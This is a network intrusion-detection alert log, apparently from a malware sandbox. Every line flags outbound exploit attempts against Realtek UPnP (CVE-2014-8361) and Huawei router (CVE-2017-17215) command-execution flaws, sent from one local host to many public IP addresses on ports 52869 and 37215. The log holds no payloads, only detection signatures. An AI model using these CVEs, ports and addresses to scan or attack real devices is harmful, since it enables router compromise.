                                      07/20/24-23:01:42.985320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273052869192.168.2.23171.174.164.32
                                      07/20/24-23:01:51.949637TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615539452869192.168.2.2348.119.173.106
                                      07/20/24-23:01:56.091033TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571052869192.168.2.2364.55.184.24
                                      07/20/24-23:01:44.428891TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25214652869192.168.2.23123.97.7.185
                                      07/20/24-23:01:46.556921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5659252869192.168.2.2381.48.180.48
                                      07/20/24-23:01:02.854348TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614262252869192.168.2.23181.219.175.178
                                      07/20/24-23:01:24.885849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098837215192.168.2.23197.212.28.22
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005437215192.168.2.23197.193.71.4
                                      07/20/24-23:01:55.536863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4896052869192.168.2.23117.131.224.39
                                      07/20/24-23:01:34.046616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034037215192.168.2.23157.123.163.220
                                      07/20/24-23:01:45.350108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409852869192.168.2.2374.130.124.117
                                      07/20/24-23:01:21.951298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.23157.139.97.65
                                      07/20/24-23:02:00.234228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024052869192.168.2.23125.137.181.188
                                      07/20/24-23:01:08.600114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24438252869192.168.2.23108.144.159.228
                                      07/20/24-23:01:56.900987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4618052869192.168.2.2367.148.56.97
                                      07/20/24-23:01:54.177524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613296452869192.168.2.23174.150.164.6
                                      07/20/24-23:01:04.118165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497237215192.168.2.23197.160.175.250
                                      07/20/24-23:01:44.325773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4367252869192.168.2.23119.138.76.79
                                      07/20/24-23:01:54.787983TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4758052869192.168.2.2367.148.56.97
                                      07/20/24-23:01:00.634292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164637215192.168.2.23197.50.46.65
                                      07/20/24-23:01:44.175702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5726652869192.168.2.23179.77.1.115
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050437215192.168.2.23197.142.168.90
                                      07/20/24-23:01:25.044669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3959452869192.168.2.23117.200.16.247
                                      07/20/24-23:01:07.075937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729437215192.168.2.2343.45.9.49
                                      07/20/24-23:01:20.110861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418037215192.168.2.23157.8.216.67
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039837215192.168.2.23157.174.150.26
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961637215192.168.2.23161.85.99.11
                                      07/20/24-23:01:53.269588TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25498052869192.168.2.23166.201.201.44
                                      07/20/24-23:01:46.552279TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614871852869192.168.2.2360.88.74.46
                                      07/20/24-23:01:56.845732TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23645452869192.168.2.2360.59.133.184
                                      07/20/24-23:01:02.083467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066037215192.168.2.2341.229.154.58
                                      07/20/24-23:01:42.719940TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5069252869192.168.2.23106.219.50.159
                                      07/20/24-23:01:43.028316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3481852869192.168.2.2357.248.72.169
                                      07/20/24-23:01:45.697846TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25818452869192.168.2.23223.33.49.156
                                      07/20/24-23:01:46.773722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3602052869192.168.2.2366.96.161.223
                                      07/20/24-23:01:31.313163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3990652869192.168.2.2367.128.52.113
                                      07/20/24-23:01:44.104536TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613496252869192.168.2.2395.85.24.175
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547037215192.168.2.2341.190.44.53
                                      07/20/24-23:01:42.466150TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615492452869192.168.2.2374.205.109.96
                                      07/20/24-23:01:02.048113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786037215192.168.2.23197.244.76.85
                                      07/20/24-23:01:31.325694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3703652869192.168.2.23149.142.97.135
                                      07/20/24-23:01:57.099838TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24182052869192.168.2.232.18.140.250
                                      07/20/24-23:01:57.847364TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24246652869192.168.2.2388.239.244.206
                                      07/20/24-23:01:47.995636TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25291452869192.168.2.2319.242.116.26
                                      07/20/24-23:00:57.221220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779437215192.168.2.2341.166.85.150
                                      07/20/24-23:01:44.837053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614208052869192.168.2.2318.202.42.80
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618637215192.168.2.23157.159.217.82
                                      07/20/24-23:01:43.946478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5705852869192.168.2.2339.124.235.174
                                      07/20/24-23:01:52.061339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613836452869192.168.2.2332.82.7.154
                                      07/20/24-23:01:41.974742TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614783652869192.168.2.23155.110.172.241
                                      07/20/24-23:01:43.282556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3570652869192.168.2.2389.86.226.219
                                      07/20/24-23:01:44.756264TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24998452869192.168.2.235.80.243.157
                                      07/20/24-23:01:46.068251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4944652869192.168.2.2377.112.72.60
                                      07/20/24-23:01:43.540053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5535852869192.168.2.23185.117.12.122
                                      07/20/24-23:01:27.653028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901437215192.168.2.23197.100.29.197
                                      07/20/24-23:01:42.692691TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5904052869192.168.2.23170.207.21.198
                                      07/20/24-23:01:45.194629TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3326452869192.168.2.23141.54.172.151
                                      07/20/24-23:01:45.164161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4542652869192.168.2.2360.240.72.8
                                      07/20/24-23:00:57.221921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982637215192.168.2.2341.65.251.158
                                      07/20/24-23:01:45.194629TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23356652869192.168.2.2389.81.144.22
                                      07/20/24-23:01:48.386032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613767252869192.168.2.232.166.49.173
                                      07/20/24-23:01:43.415157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615821252869192.168.2.2359.121.190.157
                                      07/20/24-23:01:21.936545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619437215192.168.2.23216.138.36.57
                                      07/20/24-23:01:40.320408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571837215192.168.2.23197.154.95.35
                                      07/20/24-23:01:02.259642TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615263852869192.168.2.23123.42.160.177
                                      07/20/24-23:01:45.175511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3608852869192.168.2.23217.231.155.95
                                      07/20/24-23:01:41.378871TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5828652869192.168.2.2352.167.234.201
                                      07/20/24-23:01:41.987411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304852869192.168.2.23156.69.102.152
                                      07/20/24-23:02:02.415002TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615123052869192.168.2.23216.165.192.32
                                      07/20/24-23:01:47.485617TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25501652869192.168.2.23156.42.244.253
                                      07/20/24-23:01:49.145932TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5206852869192.168.2.2359.111.61.71
                                      07/20/24-23:01:55.359808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3902252869192.168.2.23151.217.152.189
                                      07/20/24-23:01:08.667964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3689852869192.168.2.2360.208.170.61
                                      07/20/24-23:01:47.385543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3759052869192.168.2.2348.211.124.159
                                      07/20/24-23:01:51.932550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5413652869192.168.2.23134.173.191.58
                                      07/20/24-23:01:43.001716TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613967052869192.168.2.23185.86.48.66
                                      07/20/24-23:01:42.627588TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614140852869192.168.2.23197.132.250.53
                                      07/20/24-23:01:54.567167TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5562652869192.168.2.23222.178.130.155
                                      07/20/24-23:01:25.388031TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616075252869192.168.2.2358.239.1.240
                                      07/20/24-23:01:52.425638TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23628252869192.168.2.2380.133.252.53
                                      07/20/24-23:01:08.652877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3755252869192.168.2.2368.46.168.107
                                      07/20/24-23:01:08.574948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23828252869192.168.2.2377.77.58.220
                                      07/20/24-23:01:08.565561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25469052869192.168.2.2337.205.238.167
                                      07/20/24-23:01:41.722161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542852869192.168.2.2318.13.209.238
                                      07/20/24-23:01:44.274940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25834052869192.168.2.2376.231.40.42
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171437215192.168.2.23157.243.220.45
                                      07/20/24-23:02:45.524183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4114652869192.168.2.23120.235.235.116
                                      07/20/24-23:01:03.970797TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5204252869192.168.2.2375.16.13.92
                                      07/20/24-23:01:00.638418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937037215192.168.2.23190.161.188.69
                                      07/20/24-23:01:49.810143TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613283652869192.168.2.2372.2.201.225
                                      07/20/24-23:01:44.203130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615993852869192.168.2.23194.155.182.26
                                      07/20/24-23:01:47.892814TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5310852869192.168.2.23150.181.137.93
                                      07/20/24-23:01:45.716157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615614252869192.168.2.2346.179.46.173
                                      07/20/24-23:01:13.331592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5649452869192.168.2.23213.215.4.32
                                      07/20/24-23:01:56.300735TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613804652869192.168.2.23183.120.27.200
                                      07/20/24-23:01:04.114673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529437215192.168.2.23157.157.173.191
                                      07/20/24-23:01:42.718643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5841252869192.168.2.2385.146.42.42
                                      07/20/24-23:01:48.255782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613705452869192.168.2.2338.115.164.104
                                      07/20/24-23:02:48.447183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615100852869192.168.2.2336.136.49.118
                                      07/20/24-23:03:46.099099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613936252869192.168.2.23168.71.222.184
                                      07/20/24-23:01:46.439689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3516452869192.168.2.23165.21.55.96
                                      07/20/24-23:01:52.686542TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5160652869192.168.2.23206.50.68.232
                                      07/20/24-23:01:41.686830TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4502852869192.168.2.2334.239.73.219
                                      07/20/24-23:01:27.650243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883837215192.168.2.23220.166.48.209
                                      07/20/24-23:01:07.004906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697437215192.168.2.23157.246.47.96
                                      07/20/24-23:01:02.048214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817037215192.168.2.2343.99.159.58
                                      07/20/24-23:01:03.819275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6058652869192.168.2.2313.188.89.36
                                      07/20/24-23:01:42.574571TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23666652869192.168.2.2354.250.222.170
                                      07/20/24-23:01:42.935667TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613336652869192.168.2.2337.165.17.202
                                      07/20/24-23:01:52.487978TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615283652869192.168.2.23101.35.135.206
                                      07/20/24-23:01:48.187360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3888252869192.168.2.23118.191.35.155
                                      07/20/24-23:00:57.222029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895037215192.168.2.23197.71.207.159
                                      07/20/24-23:01:44.640160TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5687452869192.168.2.2350.88.74.31
                                      07/20/24-23:01:53.387026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5604052869192.168.2.23138.65.97.97
                                      07/20/24-23:01:56.400580TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24301252869192.168.2.23201.180.13.92
                                      07/20/24-23:01:41.426681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3740052869192.168.2.2364.123.182.34
                                      07/20/24-23:01:45.370481TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5663652869192.168.2.23130.200.160.126
                                      07/20/24-23:01:04.798513TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4778652869192.168.2.23115.225.187.157
                                      07/20/24-23:01:07.018425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133837215192.168.2.2341.94.23.218
                                      07/20/24-23:01:03.060799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616040252869192.168.2.2314.23.231.227
                                      07/20/24-23:01:51.888686TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613596652869192.168.2.23116.126.39.243
                                      07/20/24-23:01:43.528108TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615143652869192.168.2.23203.13.28.171
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682237215192.168.2.23157.249.16.252
                                      07/20/24-23:01:08.556166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3678052869192.168.2.2327.254.228.216
                                      07/20/24-23:01:31.312614TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4375452869192.168.2.2375.178.59.59
                                      07/20/24-23:01:21.909111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432037215192.168.2.23197.36.30.205
                                      07/20/24-23:01:20.098209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696437215192.168.2.23197.39.168.92
                                      07/20/24-23:01:42.687128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3820052869192.168.2.23168.18.159.220
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136837215192.168.2.23157.229.17.57
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092037215192.168.2.2387.221.31.50
                                      07/20/24-23:01:24.612014TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614695052869192.168.2.2377.157.20.139
                                      07/20/24-23:01:42.979245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344052869192.168.2.2343.122.229.51
                                      07/20/24-23:01:43.013771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615266852869192.168.2.23147.169.170.137
                                      07/20/24-23:01:46.069088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24086652869192.168.2.2365.170.62.168
                                      07/20/24-23:01:31.331820TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23673052869192.168.2.23212.202.137.63
                                      07/20/24-23:01:52.914136TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24047452869192.168.2.2323.141.254.89
                                      07/20/24-23:01:08.595072TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5893852869192.168.2.23166.7.60.196
                                      07/20/24-23:01:43.071126TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4471652869192.168.2.23166.254.78.153
                                      07/20/24-23:01:08.659435TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207452869192.168.2.23132.182.11.252
                                      07/20/24-23:00:59.213564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4455237215192.168.2.2341.216.133.169
                                      07/20/24-23:01:42.165780TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25149852869192.168.2.2339.181.131.100
                                      07/20/24-23:01:02.113054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498437215192.168.2.23197.81.4.61
                                      07/20/24-23:01:12.852602TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24015052869192.168.2.2327.116.111.15
                                      07/20/24-23:01:47.614619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5083452869192.168.2.2341.199.13.54
                                      07/20/24-23:01:40.307219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3786637215192.168.2.2390.71.230.151
                                      07/20/24-23:01:34.046616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174037215192.168.2.23197.7.45.224
                                      07/20/24-23:01:08.607816TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24507452869192.168.2.23177.27.5.34
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3742837215192.168.2.23218.167.11.105
                                      07/20/24-23:01:31.316196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25975052869192.168.2.23186.254.145.51
                                      07/20/24-23:02:20.433035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5436652869192.168.2.2380.255.88.144
                                      07/20/24-23:01:53.625101TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614576252869192.168.2.23122.78.135.79
                                      07/20/24-23:02:20.433034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3614252869192.168.2.23221.47.181.83
                                      07/20/24-23:01:03.416441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831052869192.168.2.2312.208.124.228
                                      07/20/24-23:02:20.410049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3849252869192.168.2.2324.105.77.87
                                      07/20/24-23:01:12.806839TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25837652869192.168.2.23183.125.8.233
                                      07/20/24-23:01:47.979559TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3632052869192.168.2.2360.59.133.184
                                      07/20/24-23:01:43.141970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614868452869192.168.2.2377.216.216.160
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043837215192.168.2.23197.121.187.182
                                      07/20/24-23:01:14.284488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045237215192.168.2.23157.13.148.173
                                      07/20/24-23:01:58.474391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25462652869192.168.2.23184.89.50.234
                                      07/20/24-23:01:57.914113TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3606652869192.168.2.2320.176.201.90
                                      07/20/24-23:01:42.612597TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25002252869192.168.2.23198.228.131.204
                                      07/20/24-23:01:44.839991TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614978452869192.168.2.2348.216.224.125
                                      07/20/24-23:01:46.453936TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25781452869192.168.2.23193.184.52.222
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163637215192.168.2.23197.40.0.63
                                      07/20/24-23:01:59.296959TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615815652869192.168.2.2339.202.167.253
                                      07/20/24-23:01:48.089365TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25667052869192.168.2.2313.253.184.187
                                      07/20/24-23:01:49.412594TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3747852869192.168.2.2320.158.48.199
                                      07/20/24-23:00:59.158278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635437215192.168.2.2384.167.140.65
                                      07/20/24-23:01:44.838946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4702652869192.168.2.23169.196.10.52
                                      07/20/24-23:01:12.807585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25589852869192.168.2.2385.213.237.39
                                      07/20/24-23:01:46.444461TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5818052869192.168.2.23170.132.161.86
                                      07/20/24-23:01:44.996260TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25865252869192.168.2.2350.61.91.2
                                      07/20/24-23:01:47.413068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4813852869192.168.2.2394.8.52.195
                                      07/20/24-23:01:31.327808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25215052869192.168.2.2338.122.84.31
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757637215192.168.2.23197.244.173.225
                                      07/20/24-23:01:52.684763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3524852869192.168.2.2317.121.90.69
